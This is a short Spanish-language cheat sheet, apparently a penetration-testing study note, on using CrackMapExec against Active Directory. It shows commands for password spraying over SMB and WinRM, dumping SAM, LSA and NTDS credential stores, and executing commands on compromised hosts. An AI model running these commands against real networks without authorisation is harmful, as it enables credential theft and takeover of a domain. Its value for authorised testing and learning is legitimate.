Crackmapexec

Definición

Crackmapexec es una herramienta para enumerar Active Directory, principalmente los servicios smb y winrm.

Uso

Esta herraminta tine distintos modos de uso.

Para enumerar información del AD.

crackmapexec smb 10.10.10.10

Aqui obtenemos el nombre del dominio, lo añadiremos en /etc/hosts para poder realizar futuros posibles ataques. Tambien obtenemos información como si está firmado o si utiliza SMBv1 y el sistema operativo.

Para comprobar usuarios válidos del AD.

crackmapexec smb -u <user>/<userfile> -p <pass>/<passfile>

En caso de que el usuario aparezca como “pwned” tendremos la capacidad de conectarnos mediante psexec.py.

Para validar si un usuario tiene disponible winrm

Para esto el usuario deberá pertenecer al groupo Remote Management Users.

crackmapexec winrm -u <user>/<userfile> -p <pass>/<passfile>

Si aparece “pwned” podremos conectarnos mediante winrm.

Stop-on-success

Esta herramienta por defecto para si encuentra un match válido, para que continue probando tenemos que añadir la flag --continue-on-success

Post-pwned

Dumpear información

Con crackmapexec podemos dumpear la SAM, LSA o NTDS. Ver diferentes tipos de Almacenamiento de credenciales.

Workstation (sam)

Sin privilegios

crackmapexec smb -u <user> -p <pass> --local-auth

Con privilegios

crackmapexec smb -u <adminuser> -p <adminpass> --sam

LSA

crackmapexec smb -u <adminuser> -p <adminpass> --lsa

Domain controller (ntds)

Y en caso de ser un domain controler podremos dumpear todo el ntds.

crackmapexec smb -u <adminuser> -p <adminpass> --ntds
crackmapexec smb -u <adminuser> -p <adminpass> --ntds vss

vss -> Uses the Volume Shadow copy Service

Ejecutar comandos en usuarios “pwned”

Si tenemos credenciales válidas para usuarios “pwned”, podemos hacer que todos ejecuten un cierto comando.

crackmapexec smb -u <adminuser> -p <adminpass> -x <cmd>

Escrito el 07-12-2021 a las 06:04 pm por creep33.